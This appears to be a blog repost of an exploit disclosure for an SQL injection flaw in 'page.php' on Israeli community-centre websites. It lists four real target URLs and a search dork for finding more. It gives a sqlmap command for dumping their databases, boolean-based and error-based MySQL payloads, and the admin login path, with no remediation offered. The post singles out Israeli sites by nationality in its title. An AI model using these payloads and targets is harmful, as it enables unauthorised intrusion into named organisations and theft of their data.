Bugs Exploit Israil SQL Injection Vulnerability Tested on BackBox Linux


Information Exploit

[+] Exploit Title: İsrail Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and Nobody (TR)
[+] Dork : inurl:’’page.php?type=activity id=1’’
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.ramotalon.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- http://www.matnas-am.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- http://www.ganim.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- https://www.rktnz.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)

[+] SQLMAP Poc :
$ sqlmap -u "http://www.matnas-am.org.il/page.php?type=activity&id=1" --dbs

[+] Poc SQL Injection :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause                                   
    Payload: type=activity&id=1 AND 4637=4637                                                                                                                                                                                                                                             
    Type: error-based                                                                                                                                 
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                             
    Payload: type=activity&id=1 AND (SELECT 4984 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(4984=4984,1))),0x7171707071,FLOOR(RAND(0)*2))x   
    FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[+] Poc local Admin :
/login.php

Sumber Bugs Exploit : [https://cxsecurity.com/issue/WLB-2018050138]

Video tutorial


Good lock .. and hopefully useful
Previous
Next Post »